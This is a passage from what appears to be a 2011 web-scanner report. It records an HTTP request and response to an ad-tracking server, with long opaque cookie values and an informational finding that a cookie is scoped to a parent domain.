rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_DDwn="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBj4llhxoQ3e3VA0m2LnBIz+ue/ihtvjfvgUjRQyGE/N8wvB4KV0u2u/nQqNyQHs6HfmYha+Qp5sTqWaE97/6FPY2NufszctJYIDjVFtpyQh0CIEl+vP5/dpLu7PRrL1oiS/ClfFrxeI1AF8IS6DnKFn1Fr5mmKOzgAxND9Mo9OYeYOF8wT55/OFvAoSEGi4AlK92bTZObuvB5gFLYnfFGjaWyblKMQxWluQafhpzFp6Bvc5GF7Zg4U8CUG8DNYLWZ/+kPT4CfotTtTBhS2HMj5t1wm7ltY8c0cncYOiX/GFPCqhadpm4fnRSKOs0tgQ/uaBLH177I5kpLNWibu9JFh2743rMdjyhEm1I47cIAfH0CjoLsmcpiBhwij5U10bFSaywY4gzxFsteGYXT4GC10czQ+BqX9phakgZxMo+9bVaP+U17lmXxiU4YXCB3kf9zFLHPqiFOIUT4KtOVjA3FaHEugMwaNTXLy9WtJyYfV5CjGB2X6utziYVahNXyaW6uAJJn6a2+H8A689I7BfxK+woj26jBVfmbcWS1uSLyQeAYZmnYvT7/cewcTWKnsW/QcTwfZswG/xPTVz6ZHwykmebftq6UUTkaQvVjwmoglL+OCUT6f2vwP8OcmhzNeASRZsfzfdGxdtm6JgPTLIWd732Bhf+vHWiQFw55hezDDmtP9IYIqqua0Eb8rvBaxmPg+L1oSQR3wKNWBOKhsy9bTDn8LU5uAkEp7VX0pWYg2JVnIA8Xn96Z5fIawmQQLtQrRo9O932kJl4CjykoRgfmN6EJnEVGUFzShNvC5Kn3q7S7rMaXvMw73K6cjhj38wsR7xguqyBChxY+KNM49AnIqRwl1H3R/rC04vWp7O39zuPsfH66U2zmTFWYiqtu11XhXxriq4jAIFtnyvSVeNwt7i4akKnDujJYU9ZkI12qoTqF67Xk1usO2dtWltsQIwovXHt/DntnaN4iUuXbTHAtIINI5+XEK/Spf3sZoJyCFFfawdJk3OcbrJy38Vl2kK3T9RnQAOPHtujBtZlECpIwPkInWbX+xtjF9257phuiajYArbun0dzjwI+dPIaE12xV2JwN0VjfL5f3/yuosBB3QMuZRKHCWcFuMIMmmVE/iudLUTga4GEhGu5IBKAJEGT+uDq/WPU3dy7QCr/MmedbUut4vRz4jRQx/oRKsNgzBeVM0lF7vZcCsSFWp+2oXWcnGn5MQ+3PDetSw3QdE9/i9rW51wGEJyA7EHMC20nBW2EuLmF/2MO0/Qb37AgH5OzNFx/EOCweAh9VF2E5Xl4Kr3qdPEaXfyg=="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa3zgxZCz2jywJqL21DklO4Fpq7W4mts2r3+iyqdBm+PPDarELVcDWOiVOeyT+dO+pdp/M4NeSHp/4tuEVh19Zfvq1L5bYy9AjO/2fUaKYXbf1osVVhbU+l7YcjeiBpzRE6vcfhoxTGljIHVG6wCLEocu/91zEVPuDOjmIRDqIfGM0UfLHLgv2C05WgPKu/Fu19yKxE9Z3VVkW2CK1OuumV2qQngq9PYypxS6SUkYSpp9rrHVqT/PyOpwz+Yo/sgsxmUZWQiDDyNiXQFhMZxn1yW3/+uLp/sCggNccLywz7ZawnFFqtRwOtG9ywJRLCbbi6Qf6QyWu5ZPZvf+B9yh4THzd3jvRSwsKraHSyXBRKVEaJmeDseo5Wb+VobukoQ/BEAlmHpDLeinaq/AX/1rEUgSl34uzGEpa+qNBUbAK/ngMZt69neAgK8pH1zdAHG6qxJkKwrL8cd/ErdLJ364VQKMKcJJYQv9BUBUZQUTSsjU8KXJjLKJkCIjxTqOUrd1f6PVTVUxf0r/OmrGX2VJ2EzmHkURDIYKyDLfZRA28hnB+UGxyDx3J28jPgoQ6V2zOBqn6vO+BaB9czT3Pyzhw2zMuhWxmZIuP1ABWLQ2wglbGoGVK4Lg7CZlPXy48GZALMjYG/SzbMc416TCyBOi/GcdBny5UfdmjPTenMQNUq5eCHvBbygsH8RyMoi1NB+RL0l52zXfUmHN+Q6QbrGRFNjvHhodj5R+T2gE/vieij3yag2U+HgtAlMwjGgBjNH4dxeJeP96HV6pgFgb+tOy5RkjpaVtLFSV1Kw8WjJ3jRzjkDnyxYuDGTBpq4M9pG67MZzkZ8Z7CEJgr9Sr9nMn2gGV6m82QmQCZxf5fYAC0AGgTHv0muayhLxjkOoaOvNN0KOHH3f3VOSgrL0338jM64C8MG88442yIdh1fDE7HMeLrJyDXt+/SQw3pu6CtESExSC2/ihtES+iX5YG9qFutjJeIezi78i67NFUHNvXitAHTTzKdhayUDhyL9HQIIA7FsnUI9616D37mVQdk1p3yHGyrGWGGaI+3PjvCxCq/k5seAoyejo91b8ZXe51PMtpSm4/xebGzWUnTCmp6396tnM+OfnDv/5amMR8cZIHDBKWEmTAN7Qoo4AqXarcqeptRvIuTkBdIpxB6kZ851imd31MQS7VI1Kqqiw2fwFTIZ8kOZWqNa6UV/UuTlsrFGFgk22MVQ+rtNWzWaGjvda/CeLMb5K62PgL75dYCl7QfBLYgVwvBPevdi4TsXqIKLwkCI1ISidfCbf0PiQrHd3KhCJPgf5Gmc+mq3Z6njumYoPm5eTIUI4Ll4DSkb6K+WdFu3GNj1AGfvd1tYrnNqkPR0vESx4VDrWEGbI+1NVtZANrbezr+az+bYb7Gz/5NNYXk2/iNVyvnzgdT4j9zg4JebjZ774LSV6xP+redbMdzWAjZCT44zcQMo49X7AmBfaTSs8fphDdQ4Ig9euig3NPEiqwNrPZoqdOzaC2XR2z3h0iUqBgfIztlpuAnOlupJ8qaVnHZBq0C2rL7HASXl6M3Uqp74FqMyLuz7JTX83vxFTlhKNL6SjJM6ZhQ8ZuT3WnVCZA6CGBnLoxb11tCRm3EEWnwXyKaHZ/c+oxhP+XOXbShE4fREZ6kYnNrcRz7hrsObpe7aBmPw1Ak/q94Nn+2OGoD8lFxeWVj6V/RYtUqT8iJVOiKx52Pt6FOIKlgkry8cPdNmGXhFR7wyV4y0="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyRNxTMIyexPBnJTV8/3oC+TvfALvHH1MS91ujA8M4hZWMczl66KYKz2pf0Zw1L9uMJPxWRaldOD68PM2ZgauUdRf5woh8fs+os1Y/5QogtLkbexA3zwQvVw7cimsoGkc/zKCpmhRLT+m3BlzY0P8h++dSK0X9IxzVpwWrlb7Ei5ltcn8hYUhv1Vpni7zlqUdxGLqcaA2+TabpPdHMKQ91CENRG3JVHnfCa5MyR1AK1OlVnt+lGd11ePCpXf0YpbEfWJT5C94XH9v496KovTRymy1aeQuJopmMR/UPu+uGSjdDORhPAdAi0nR1QxGf1/00

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QY0qP1/RHB/bhABQqsC6PjuYiHsXCMVouXiWpLwAJncCH8Zz+R5sVSYoe/Ie4GnZHI4uL0HiW7q7XNODWxC8Rkr+FiCdZrx2A7gJRW8ynaYBSuVYj/QxeB+f04; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:48:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:48:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.130. http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/204994515.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXZ8qnxnNHqGrp84hH/bhN0xQOOlD7YTKMTz5jLRWbQcdYbDr7Hjqv0yExhy1fy3n104B0a6KC4V5fwl/ueW59kACHLWrA+OydZDjZS9CIFnDETNjcdmwWlQPRzO+JjeN8UHPBRTjLTQMJBSE/72npdUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9NtGZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+URhAE83doE5n/Jh7rUvLssOKNIl0z9NOW8n0Io1Z0J+sMQ+tZ6lcs2ixNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:10:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/204994515.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_DsKn="MLsXtSENZjhvJ5E42+o8IIHenkhq5qBeuROGrbg7AvL3EEev5M/krnpihGFj4llhDqDeS9EvCK92NbnfmznwdDZ+f/x50E6qWK9kX1RiBwIrjIhV1zzE+yJinZCcWAffDGr/fQqf5eXaX62WJEfUyrs1AY+WcQX3QSiYgKjI0tuAJTrJFoiXSLCMUoGB5Fj1DZs51EqeoCjEh85w0duh0HsfyhcVuZizISbJBEIs4nNfJnVew641ZM32JGQPySxu0885H9uv68kgXwSoXE8O8NNW74AOzfMuVcOzQkiIsgpytVrGsShevXNpu1N0OMQSDlPs/OHOCLP7qEHw3O/Vb3UYanUY3TJM0VbVqeDBe6HmbZ6KjhM1kr4rdRopigC89ToLf5WAig518rtcbdG8NKGAqhdFZxUDPWyAFwYV5acoYWNP3yJAyIyYbzkHHK1YiL+KUgGY6GLmOqN/7SKubkScZK5EAQAIqCCpk6YxIpngLokr53YX35rmIGY0NW/+bjc4M/LDVMiW29xi/ZMTssmw3Wa8Nkpgda3YvKrBv7n9YeQM4snrjfoju+yPF457jTZhVB7Jm2CjMyJzj6G8GM63ga3nS2+i8yv263F4Wpzu9CC46HBuPGAd1SvSLGgtSF5hAd5Ocx+Cih7BwRSNJZUEziD6Rwcu8AYA6PiJrqloUwFQLoDA+Eq16doVb5QGC+dqqEB+PAfQGYghAVaPJdH8NXPCLyI8hI3c3n2Uywh3jemnEmh5AnRm7toMwGDuBUEnLsDwZc+zmGF0zwvPqPI7KC9Ov8kIh2DiBIdgCI0dehyD8CKYAvMWQJKTWTcO2xCMuqr0m3TIjTSXHqpdkLnQ+IJhcyVBCwx7EupOeTnIM8E4Dt66xSIGR/ZPrdMJo9O/qKkLob/lmLHQLTS6bg22piEzgFHJIk2bx1sznd76biydjpWvzLGesOYS4PHTI1AU9mlSaxbxlcDeHY5/TQFB0RtzJ7lVyty2qNP6RjgA8z1i5vxbD86CbgWe+ZlLSRoZwIUYH0MbHAtIItI5+Y0S/Spf3sZo10KTUKH7FCMwA/88zxUd6r1DedrKoXDP34dGwdtPrDcY/6StiXMWTJzaxNFT3qphvM6do3OlrgooQdNS6E5Q4V5BIQStgyPEjlDyI7PPCUnITaT1NOaxNF4FCA8F2canVE/iudBUTwaY2Mimu5ABKgK03k9sphx96Xva1OGeWQtxuTcr7gBfDqH0Y+0241HxlQJ6/HNfasFJqi3HthzBtTaOQc28+TiVUK5lVg+gFzAZuThq9h2lgPyTbQQMTRTOIJ/kql6x38NYjivqNjYxauQxyMgUVG70Rb2thjzzctYXkwY7+42wTd9k2Uc="; 